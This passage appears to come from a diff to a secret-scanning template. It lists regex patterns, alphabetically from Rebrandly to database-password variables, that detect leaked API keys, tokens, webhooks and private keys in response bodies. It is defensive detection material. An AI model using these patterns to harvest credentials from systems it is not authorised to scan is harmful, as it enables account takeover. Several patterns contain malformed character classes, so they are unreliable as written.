regex + name: rebrandly + regex: + - (?:rebrandly).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: refiner + regex: + - >- + (?:refiner).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: repairshopr_1 + regex: + - (?:repairshopr).{0,40}\b([a-zA-Z0-9_.!+$#^*]{3,32})\b + part: body + - type: regex + name: repairshopr_2 + regex: + - (?:repairshopr).{0,40}\b([a-zA-Z0-9-]{51})\b + part: body + - type: regex + name: restpack + regex: + - (?:restpack).{0,40}\b([a-zA-Z0-9]{48})\b + part: body + - type: regex + name: restpackhtmltopdfapi + regex: + - (?:restpack).{0,40}\b([0-9A-Za-z]{48})\b + part: body + - type: regex + name: rev_1 + regex: + - (?:rev).{0,40}\b([0-9a-zA-Z\/\+]{27}\=[ \r\n]{1}) + part: body + - type: regex + name: revampcrm_1 + regex: + - (?:revamp).{0,40}\b([a-zA-Z0-9]{40}\b) + part: body + - type: regex + name: ringcentral_1 + regex: + - (?:ringcentral).{0,40}\b(https://www.[0-9A-Za-z_-]{1,}.com)\b + part: body + - type: regex + name: ringcentral_2 + regex: + - (?:ringcentral).{0,40}\b([0-9A-Za-z_-]{22})\b + part: body + - type: regex + name: ritekit + regex: + - (?:ritekit).{0,40}\b([0-9a-f]{44})\b + part: body + - type: regex + name: roaring + regex: + - (?:roaring).{0,40}\b([0-9A-Za-z_-]{28})\b + part: body + - type: regex + name: rocketreach + regex: + - (?:rocketreach).{0,40}\b([a-z0-9-]{39})\b + part: body + - type: regex + name: roninapp_2 + regex: + - (?:ronin).{0,40}\b([0-9a-zA-Z]{26})\b + part: body + - type: regex + name: route4me + regex: + - (?:route4me).{0,40}\b([0-9A-Z]{32})\b + part: body + - type: regex + name: rownd_1 + regex: + - >- + (?:rownd).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12})\b + part: body + - type: regex + name: rownd_2 + regex: + - (?:rownd).{0,40}\b([a-z0-9]{48})\b + part: body + - type: regex + name: rownd_3 + regex: + - (?:rownd).{0,40}\b([0-9]{18})\b + part: body + - type: regex + name: rubygems + regex: + - \b(rubygems_[a-zA0-9]{48})\b + part: body + - type: regex + name: runrunit_1 + regex: + - (?:runrunit).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: runrunit_2 + regex: + - (?:runrunit).{0,40}\b([0-9A-Za-z]{18,20})\b + part: body + - type: regex + name: ssh + regex: + - '-----BEGIN OPENSSH PRIVATE KEY-----' + part: body + - type: regex + name: ssh_dsa_private_key + regex: + - '-----BEGIN DSA PRIVATE KEY-----' + part: body + - type: regex + name: salesblink + regex: + - (?:salesblink).{0,40}\b([a-zA-Z]{16})\b + part: body + - type: regex + name: salescookie + regex: + - (?:salescookie).{0,40}\b([a-zA-z0-9]{32})\b + part: body + - type: regex + name: salesflare + regex: + - (?:salesflare).{0,40}\b([a-zA-Z0-9_]{45})\b + part: body + - type: regex + name: satismeterprojectkey_1 + regex: + - >- + (?:satismeter).{0,40}\b([a-zA-Z0-9]{4,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,12})\b + part: body + - type: regex + name: satismeterprojectkey_2 + regex: + - (?:satismeter).{0,40}\b([a-zA-Z0-9]{24})\b + part: body + - type: regex + name: satismeterprojectkey_3 + regex: + - (?:satismeter).{0,40}\b([a-zA-Z0-9!=@#$%^]{6,32}) + part: body + - type: regex + name: satismeterwritekey + regex: + - (?:satismeter).{0,40}\b([a-z0-9A-Z]{16})\b + part: body + - type: regex + name: saucelabs_1 + regex: + - \b(oauth\-[a-z0-9]{8,}\-[a-z0-9]{5})\b + part: body + - type: regex + name: saucelabs_2 + regex: + - >- + (?:saucelabs).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12})\b + part: body + - type: regex + name: scalewaykey + regex: + - >- + (?:scaleway).{0,40}\b([0-9a-z]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: scrapeowl + regex: + - (?:scrapeowl).{0,40}\b([0-9a-z]{30})\b + part: body + - type: regex + name: scraperapi + regex: + - (?:scraperapi).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: scraperbox + regex: + - (?:scraperbox).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: scrapersite + regex: + - (?:scrapersite).{0,40}\b([a-zA-Z0-9]{45})\b + part: body + - type: regex + name: scrapestack + regex: + - (?:scrapestack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: scrapfly + regex: + - (?:scrapfly).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: scrapingant + regex: + - (?:scrapingant).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: scrapingbee + regex: + - (?:scrapingbee).{0,40}\b([A-Z0-9]{80})\b + part: body + - type: regex + name: screenshotapi + regex: + - >- + (?:screenshotapi).{0,40}\b([0-9A-Z]{7}\-[0-9A-Z]{7}\-[0-9A-Z]{7}\-[0-9A-Z]{7})\b + part: body + - type: regex + name: screenshotlayer + regex: + - (?:screenshotlayer).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: securitytrails + regex: + - (?:securitytrails).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: segmentapikey + regex: + - >- + (?:segment).{0,40}\b([A-Za-z0-9_\-a-zA-Z]{43}\.[A-Za-z0-9_\-a-zA-Z]{43})\b + part: body + - type: regex + name: selectpdf + regex: + - (?:selectpdf).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: semaphore + regex: + - (?:semaphore).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: sendgrid_api_key + regex: + - SG\.[\w_]{16,32}\.[\w_]{16,64} + part: body + - type: regex + name: sendbird_1 + regex: + - (?:sendbird).{0,40}\b([0-9a-f]{40})\b + part: body + - type: regex + name: sendbird_2 + regex: + - >- + (?:sendbird).{0,40}\b([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\b + part: body + - type: regex + name: sendbirdorganizationapi + regex: + - (?:sendbird).{0,40}\b([0-9a-f]{24})\b + part: body + - type: regex + name: sendgrid + regex: + - (?:sendgrid).{0,40}(SG\.[\w\-_]{20,24}\.[\w\-_]{39,50})\b + part: body + - type: regex + name: sendinbluev2 + regex: + - \b(xkeysib\-[A-Za-z0-9_-]{81})\b + part: body + - type: regex + name: sentiment_1 + regex: + - (?:sentiment).{0,40}\b([0-9]{17})\b + part: body + - type: regex + name: sentiment_2 + regex: + - (?:sentiment).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: sentrytoken + regex: + - (?:sentry).{0,40}\b([a-f0-9]{64})\b + part: body + - type: regex + name: serphouse + regex: + - (?:serphouse).{0,40}\b([0-9A-Za-z]{60})\b + part: body + - type: regex + name: serpstack + regex: + - (?:serpstack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: sheety_1 + regex: + - (?:sheety).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: sheety_2 + regex: + - (?:sheety).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: sherpadesk + regex: + - (?:sherpadesk).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: shipday + regex: + - (?:shipday).{0,40}\b([a-zA-Z0-9.]{11}[a-zA-Z0-9]{20})\b + part: body + - type: regex + name: shodankey + regex: + - (?:shodan).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: shopify_access_token + regex: + - shpat_[a-fA-F0-9]{32} + part: body + - type: regex + name: shopify_custom_app_access_token + regex: + - shpca_[a-fA-F0-9]{32} + part: body + - type: regex + name: shopify_private_app_access_token + regex: + - shppa_[a-fA-F0-9]{32} + part: body + - type: regex + name: shopify_shared_secret + regex: + - shpss_[a-fA-F0-9]{32} + part: body + - type: regex + name: shortcut + regex: + - (?:shortcut).{0,40}\b([0-9a-f-]{36})\b + part: body + - type: regex + name: shotstack + regex: + - (?:shotstack).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: shutterstockoauth + regex: + - (?:shutterstock).{0,40}\b(v2/[0-9A-Za-z]{388})\b + part: body + - type: regex + name: signalwire_1 + regex: + - \b([0-9a-z-]{3,64}.signalwire.com)\b + part: body + - type: regex + name: signalwire_2 + regex: + - >- + (?:signalwire).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: signalwire_3 + regex: + - (?:signalwire).{0,40}\b([0-9A-Za-z]{50})\b + part: body + - type: regex + name: signaturit + regex: + - (?:signaturit).{0,40}\b([0-9A-Za-z]{86})\b + part: body + - type: regex + name: signupgenius + regex: + - (?:signupgenius).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: sigopt + regex: + - (?:sigopt).{0,40}\b([A-Z0-9]{48})\b + part: body + - type: regex + name: simplesat + regex: + - (?:simplesat).{0,40}\b([a-z0-9]{40}) + part: body + - type: regex + name: simplynoted + regex: + - (?:simplynoted).{0,40}\b([a-zA-Z0-9\S]{340,360})\b + part: body + - type: regex + name: simvoly + regex: + - (?:simvoly).{0,40}\b([a-z0-9]{33})\b + part: body + - type: regex + name: sinchmessage + regex: + - (?:sinch).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: sirv_1 + regex: + - (?:sirv).{0,40}\b([a-zA-Z0-9\S]{88}) + part: body + - type: regex + name: sirv_2 + regex: + - (?:sirv).{0,40}\b([a-zA-Z0-9]{26})\b + part: body + - type: regex + name: siteleaf + regex: + - (?:siteleaf).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: skrappio + regex: + - (?:skrapp).{0,40}\b([a-z0-9A-Z]{42})\b + part: body + - type: regex + name: skybiometry + regex: + - (?:skybiometry).{0,40}\b([0-9a-z]{25,26})\b + part: body + - type: regex + name: slack + regex: + - xox[baprs]-[0-9a-zA-Z]{10,48} + part: body + - type: regex + name: slack_token + regex: + - (xox[pborsa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32}) + part: body + - type: regex + name: slack_webhook + regex: + - >- + https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,24} + part: body + - type: regex + name: slack_access_token + regex: + - xoxb-[0-9A-Za-z\-]{51} + part: body + - type: regex + name: slackwebhook + regex: + - (https:\/\/hooks.slack.com\/services\/[A-Za-z0-9+\/]{44,46}) + part: body + - type: regex + name: smartsheets + regex: + - (?:smartsheets).{0,40}\b([a-zA-Z0-9]{37})\b + part: body + - type: regex + name: smartystreets_1 + regex: + - (?:smartystreets).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: smartystreets_2 + regex: + - (?:smartystreets).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: smooch_1 + regex: + - (?:smooch).{0,40}\b(act_[0-9a-z]{24})\b + part: body + - type: regex + name: smooch_2 + regex: + - (?:smooch).{0,40}\b([0-9a-zA-Z_-]{86})\b + part: body + - type: regex + name: snipcart + regex: + - (?:snipcart).{0,40}\b([0-9A-Za-z_]{75})\b + part: body + - type: regex + name: snykkey + regex: + - >- + (?:snyk).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: sonarqube_token + regex: + - sonar.{0,50}(?:"|'|`)?[0-9a-f]{40}(?:"|'|`)? + part: body + - type: regex + name: splunkobservabilitytoken + regex: + - (?:splunk).{0,40}\b([a-z0-9A-Z]{22})\b + part: body + - type: regex + name: spoonacular + regex: + - (?:spoonacular).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: sportsmonk + regex: + - (?:sportsmonk).{0,40}\b([0-9a-zA-Z]{60})\b + part: body + - type: regex + name: square + regex: + - (?:square).{0,40}(EAAA[a-zA-Z0-9\-\+\=]{60}) + part: body + - type: regex + name: square_oauth_secret + regex: + - sq0csp-[0-9A-Za-z\-_]{43} + part: body + - type: regex + name: square_access_token + regex: + - sq0atp-[0-9A-Za-z\-_]{22} + part: body + - type: regex + name: squareapp_1 + regex: + - '[\w\-]*sq0i[a-z]{2}-[0-9A-Za-z\-_]{22,43}' + part: body + - type: regex + name: squareapp_2 + regex: + - '[\w\-]*sq0c[a-z]{2}-[0-9A-Za-z\-_]{40,50}' + part: body + - type: regex + name: squarespace + regex: + - >- + (?:squarespace).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: squareup + regex: + - \b(sq0idp-[0-9A-Za-z]{22})\b + part: body + - type: regex + name: sslmate + regex: + - (?:sslmate).{0,40}\b([a-zA-Z0-9]{36})\b + part: body + - type: regex + name: stitchdata + regex: + - (?:stitchdata).{0,40}\b([0-9a-z_]{35})\b + part: body + - type: regex + name: stockdata + regex: + - (?:stockdata).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: storecove + regex: + - (?:storecove).{0,40}\b([a-zA-Z0-9_-]{43})\b + part: body + - type: regex + name: stormglass + regex: + - (?:stormglass).{0,40}\b([0-9Aa-z-]{73})\b + part: body + - type: regex + name: storyblok + regex: + - (?:storyblok).{0,40}\b([0-9A-Za-z]{22}t{2})\b + part: body + - type: regex + name: storychief + regex: + - (?:storychief).{0,40}\b([a-zA-Z0-9_\-.]{940,1000}) + part: body + - type: regex + name: strava_1 + regex: + - (?:strava).{0,40}\b([0-9]{5})\b + part: body + - type: regex + name: strava_2 + regex: + - (?:strava).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: streak + regex: + - (?:streak).{0,40}\b([0-9Aa-f]{32})\b + part: body + - type: regex + name: stripe + regex: + - '[rs]k_live_[a-zA-Z0-9]{20,30}' + part: body + - type: regex + name: stripe_api_key_1 + regex: + - sk_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_api_key_2 + regex: + - stripe[sr]k_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_api_key_3 + regex: + - stripe[sk|rk]_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_public_live_key + regex: + - pk_live_[0-9a-z]{24} + part: body + - type: regex + name: stripe_public_test_key + regex: + - pk_test_[0-9a-z]{24} + part: body + - type: regex + name: stripe_restriced_key + regex: + - rk_(?:live|test)_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_restricted_api_key + regex: + - rk_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_secret_key + regex: + - sk_(?:live|test)_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_secret_live_key + regex: + - (sk|rk)_live_[0-9a-z]{24} + part: body + - type: regex + name: stripe_secret_test_key + regex: + - (sk|rk)_test_[0-9a-z]{24} + part: body + - type: regex + name: stytch_1 + regex: + - (?:stytch).{0,40}\b([a-zA-Z0-9-_]{47}=) + part: body + - type: regex + name: stytch_2 + regex: + - (?:stytch).{0,40}\b([a-z0-9-]{49})\b + part: body + - type: regex + name: sugester_1 + regex: + - (?:sugester).{0,40}\b([a-zA-Z0-9_.!+$#^*%]{3,32})\b + part: body + - type: regex + name: sugester_2 + regex: + - (?:sugester).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: sumologickey_1 + regex: + - (?:sumo).{0,40}\b([A-Za-z0-9]{14})\b + part: body + - type: regex + name: sumologickey_2 + regex: + - (?:sumo).{0,40}\b([A-Za-z0-9]{64})\b + part: body + - type: regex + name: supernotesapi + regex: + - (?:supernotes).{0,40}([ \r\n]{0,1}[0-9A-Za-z\-_]{43}[ \r\n]{1}) + part: body + - type: regex + name: surveybot + regex: + - (?:surveybot).{0,40}\b([A-Za-z0-9-]{80})\b + part: body + - type: regex + name: surveysparrow + regex: + - (?:surveysparrow).{0,40}\b([a-zA-Z0-9-_]{88})\b + part: body + - type: regex + name: survicate + regex: + - (?:survicate).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: swell_2 + regex: + - (?:swell).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: swiftype + regex: + - >- + (?:swiftype).{0,40}\b([a-zA-z-0-9]{6}\_[a-zA-z-0-9]{6}\-[a-zA-z-0-9]{6})\b + part: body + - type: regex + name: tallyfy + regex: + - >- + (?:tallyfy).{0,40}\b([0-9A-Za-z]{36}\.[0-9A-Za-z]{264}\.[0-9A-Za-z\-\_]{683})\b + part: body + - type: regex + name: tatumio + regex: + - (?:tatum).{0,40}\b([0-9a-z-]{36})\b + part: body + - type: regex + name: taxjar + regex: + - (?:taxjar).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: teamgate_1 + regex: + - (?:teamgate).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: teamgate_2 + regex: + - (?:teamgate).{0,40}\b([a-zA-Z0-9]{80})\b + part: body + - type: regex + name: teamworkcrm + regex: + - >- + (?:teamwork|teamworkcrm).{0,40}\b(tkn\.v1_[0-9A-Za-z]{71}=[ + \r\n]{1}) + part: body + - type: regex + name: teamworkdesk + regex: + - >- + (?:teamwork|teamworkdesk).{0,40}\b(tkn\.v1_[0-9A-Za-z]{71}=[ + \r\n]{1}) + part: body + - type: regex + name: teamworkspaces + regex: + - >- + (?:teamwork|teamworkspaces).{0,40}\b(tkn\.v1_[0-9A-Za-z]{71}=[ + \r\n]{1}) + part: body + - type: regex + name: technicalanalysisapi + regex: + - (?:technicalanalysisapi).{0,40}\b([A-Z0-9]{48})\b + part: body + - type: regex + name: telegram_bot_api_key + regex: + - '[0-9]+:AA[0-9A-Za-z\-_]{33}' + part: body + - type: regex + name: telegram_secret + regex: + - d{5,}:A[0-9a-z_-]{34,34} + part: body + - type: regex + name: telegrambottoken + regex: + - (?:telegram).{0,40}\b([0-9]{8,10}:[a-zA-Z0-9_-]{35})\b + part: body + - type: regex + name: telnyx + regex: + - (?:telnyx).{0,40}\b(KEY[0-9A-Za-z_-]{55})\b + part: body + - type: regex + name: terraformcloudpersonaltoken + regex: + - \b([A-Za-z0-9]{14}.atlasv1.[A-Za-z0-9]{67})\b + part: body + - type: regex + name: text2data + regex: + - >- + (?:text2data).{0,40}\b([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\b + part: body + - type: regex + name: textmagic_1 + regex: + - (?:textmagic).{0,40}\b([0-9A-Za-z]{30})\b + part: body + - type: regex + name: textmagic_2 + regex: + - (?:textmagic).{0,40}\b([0-9A-Za-z]{1,25})\b + part: body + - type: regex + name: theoddsapi + regex: + - (?:theoddsapi|the-odds-api).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: thinkific_1 + regex: + - (?:thinkific).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: thinkific_2 + regex: + - (?:thinkific).{0,40}\b([0-9A-Za-z]{4,40})\b + part: body + - type: regex + name: thousandeyes_1 + regex: + - (?:thousandeyes).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: thousandeyes_2 + regex: + - >- + (?:thousandeyes).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: ticketmaster + regex: + - (?:ticketmaster).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: tiingo + regex: + - (?:tiingo).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: timezoneapi + regex: + - (?:timezoneapi).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: tly + regex: + - (?:tly).{0,40}\b([0-9A-Za-z]{60})\b + part: body + - type: regex + name: tmetric + regex: + - (?:tmetric).{0,40}\b([0-9A-Z]{64})\b + part: body + - type: regex + name: todoist + regex: + - (?:todoist).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: toggltrack + regex: + - (?:toggl).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: tomorrowio + regex: + - (?:tomorrow).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: tomtom + regex: + - (?:tomtom).{0,40}\b([0-9Aa-zA-Z]{32})\b + part: body + - type: regex + name: tradier + regex: + - (?:tradier).{0,40}\b([a-zA-Z0-9]{28})\b + part: body + - type: regex + name: travelpayouts + regex: + - (?:travelpayouts).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: travisci + regex: + - (?:travis).{0,40}\b([a-zA-Z0-9A-Z_]{22})\b + part: body + - type: regex + name: trello_url + regex: + - https://trello.com/b/[0-9a-z]/[0-9a-z_-]+ + part: body + - type: regex + name: trelloapikey_2 + regex: + - (?:trello).{0,40}\b([a-zA-Z-0-9]{32})\b + part: body + - type: regex + name: twelvedata + regex: + - (?:twelvedata).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: twilio_1 + regex: + - \bAC[0-9a-f]{32}\b + part: body + - type: regex + name: twilio_api_key + regex: + - SK[0-9a-fA-F]{32} + part: body + - type: regex + name: twitter_client_id + regex: + - twitter[0-9a-z]{18,25} + part: body + - type: regex + name: twitter_secret_key + regex: + - twitter[0-9a-z]{35,44} + part: body + - type: regex + name: tyntec + regex: + - (?:tyntec).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: typeform + regex: + - (?:typeform).{0,40}\b([0-9A-Za-z]{44})\b + part: body + - type: regex + name: ubidots + regex: + - \b(BBFF-[0-9a-zA-Z]{30})\b + part: body + - type: regex + name: unifyid + regex: + - (?:unify).{0,40}\b([0-9A-Za-z_=-]{44}) + part: body + - type: regex + name: unplugg + regex: + - (?:unplu).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: unsplash + regex: + - (?:unsplash).{0,40}\b([0-9A-Za-z_]{43})\b + part: body + - type: regex + name: upcdatabase + regex: + - (?:upcdatabase).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: uplead + regex: + - (?:uplead).{0,40}\b([a-z0-9-]{32})\b + part: body + - type: regex + name: uploadcare + regex: + - (?:uploadcare).{0,40}\b([a-z0-9]{20})\b + part: body + - type: regex + name: upwave + regex: + - (?:upwave).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: urlscan + regex: + - (?:urlscan).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: userstack + regex: + - (?:userstack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: vatlayer + regex: + - (?:vatlayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: vercel + regex: + - (?:vercel).{0,40}\b([a-zA-Z0-9]{24})\b + part: body + - type: regex + name: verifier_1 + regex: + - >- + (?:verifier).{0,40}\b([a-zA-Z-0-9-]{5,16}\@[a-zA-Z-0-9]{4,16}\.[a-zA-Z-0-9]{3,6})\b + part: body + - type: regex + name: verifier_2 + regex: + - (?:verifier).{0,40}\b([a-z0-9]{96})\b + part: body + - type: regex + name: verimail + regex: + - (?:verimail).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: veriphone + regex: + - (?:veriphone).{0,40}\b([0-9A-Z]{32})\b + part: body + - type: regex + name: versioneye + regex: + - (?:versioneye).{0,40}\b([a-zA-Z0-9-]{40})\b + part: body + - type: regex + name: viewneo + regex: + - >- + (?:viewneo).{0,40}\b([a-z0-9A-Z]{120,300}.[a-z0-9A-Z]{150,300}.[a-z0-9A-Z-_]{600,800}) + part: body + - type: regex + name: virustotal + regex: + - (?:virustotal).{0,40}\b([a-f0-9]{64})\b + part: body + - type: regex + name: visualcrossing + regex: + - (?:visualcrossing).{0,40}\b([0-9A-Z]{25})\b + part: body + - type: regex + name: voicegain + regex: + - >- + (?:voicegain).{0,40}\b(ey[0-9a-zA-Z_-]{34}.ey[0-9a-zA-Z_-]{108}.[0-9a-zA-Z_-]{43})\b + part: body + - type: regex + name: vouchery_1 + regex: + - (?:vouchery).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: vouchery_2 + regex: + - (?:vouchery).{0,40}\b([a-zA-Z0-9-\S]{2,20})\b + part: body + - type: regex + name: vpnapi + regex: + - (?:vpnapi).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: vultrapikey + regex: + - (?:vultr).{0,40} \b([A-Z0-9]{36})\b + part: body + - type: regex + name: vyte + regex: + - (?:vyte).{0,40}\b([0-9a-z]{50})\b + part: body + - type: regex + name: walkscore + regex: + - (?:walkscore).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: weatherbit + regex: + - (?:weatherbit).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: weatherstack + regex: + - (?:weatherstack).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: webex_1 + regex: + - (?:error).{0,40}(redirect_uri_mismatch) + part: body + - type: regex + name: webex_2 + regex: + - (?:webex).{0,40}\b([A-Za-z0-9_-]{65})\b + part: body + - type: regex + name: webex_3 + regex: + - (?:webex).{0,40}\b([A-Za-z0-9_-]{64})\b + part: body + - type: regex + name: webflow + regex: + - (?:webflow).{0,40}\b([a-zA0-9]{64})\b + part: body + - type: regex + name: webscraper + regex: + - (?:webscraper).{0,40}\b([a-zA-Z0-9]{60})\b + part: body + - type: regex + name: webscraping + regex: + - (?:webscraping).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: wepay_2 + regex: + - (?:wepay).{0,40}\b([a-zA-Z0-9_?]{62})\b + part: body + - type: regex + name: whoxy + regex: + - (?:whoxy).{0,40}\b([0-9a-z]{33})\b + part: body + - type: regex + name: worksnaps + regex: + - (?:worksnaps).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: workstack + regex: + - (?:workstack).{0,40}\b([0-9Aa-zA-Z]{60})\b + part: body + - type: regex + name: worldcoinindex + regex: + - (?:worldcoinindex).{0,40}\b([a-zA-Z0-9]{35})\b + part: body + - type: regex + name: worldweather + regex: + - (?:worldweather).{0,40}\b([0-9a-z]{31})\b + part: body + - type: regex + name: wrike + regex: + - (?:wrike).{0,40}\b(ey[a-zA-Z0-9-._]{333})\b + part: body + - type: regex + name: yandex + regex: + - (?:yandex).{0,40}\b([a-z0-9A-Z.]{83})\b + part: body + - type: regex + name: youneedabudget + regex: + - (?:youneedabudget).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: yousign + regex: + - (?:yousign).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: zapierwebhook + regex: + - (https:\/\/hooks.zapier.com\/hooks\/catch\/[A-Za-z0-9\/]{16}) + part: body + - type: regex + name: zendeskapi_3 + regex: + - (?:zendesk).{0,40}([A-Za-z0-9_-]{40}) + part: body + - type: regex + name: zenkitapi + regex: + - (?:zenkit).{0,40}\b([0-9a-z]{8}\-[0-9A-Za-z]{32})\b + part: body + - type: regex + name: zenscrape + regex: + - >- + (?:zenscrape).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: zenserp + regex: + - (?:zenserp).{0,40}\b([0-9a-z-]{36})\b + part: body + - type: regex + name: zeplin + regex: + - (?:zeplin).{0,40}\b([a-zA-Z0-9-.]{350,400})\b + part: body + - type: regex + name: zerobounce + regex: + - (?:zerobounce).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: zipapi_1 + regex: + - (?:zipapi).{0,40}\b([a-zA-Z0-9!=@#$%^]{7,}) + part: body + - type: regex + name: zipapi_3 + regex: + - (?:zipapi).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: zipcodeapi + regex: + - (?:zipcodeapi).{0,40}\b([a-zA-Z0-9]{64})\b + part: body + - type: regex + name: zonkafeedback + regex: + - (?:zonka).{0,40}\b([A-Za-z0-9]{36})\b + part: body + - type: regex + name: amazon_secret_access_key + regex: + - amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :) + part: body + - type: regex + name: ansible_vault_password + regex: + - ansible[_-]?vault[_-]?password(=| =|:| :) + part: body + - type: regex + name: chrome_client_secret + regex: + - chrome[_-]?client[_-]?secret(=| =|:| :) + part: body + - type: regex + name: chrome_refresh_token + regex: + - chrome[_-]?refresh[_-]?token(=| =|:| :) + part: body + - type: regex + name: ci_deploy_password + regex: + - ci[_-]?deploy[_-]?password(=| =|:| :) + part: body + - type: regex + name: ci_project_url + regex: + - ci[_-]?project[_-]?url(=| =|:| :) + part: body + - type: regex + name: ci_registry_user + regex: + - ci[_-]?registry[_-]?user(=| =|:| :) + part: body + - type: regex + name: ci_server_name + regex: + - ci[_-]?server[_-]?name(=| =|:| :) + part: body + - type: regex + name: cloud_api_key + regex: + - cloud[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: cloudflare_api_key + regex: + - cloudflare[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: cloudflare_auth_email + regex: + - cloudflare[_-]?auth[_-]?email(=| =|:| :) + part: body + - type: regex + name: consumer_key + regex: + - consumer[_-]?key(=| =|:| :) + part: body + - type: regex + name: database_username + regex: + - database[_-]?username(=| =|:| :) + part: body + - type: regex + name: db_password + regex: + - db[_-]?password(=| =|:| :) + part: body + - type: regex + name: db_pw + regex: + - db[_-]?pw(=| =|:| :) + part: body + - type: regex + name: 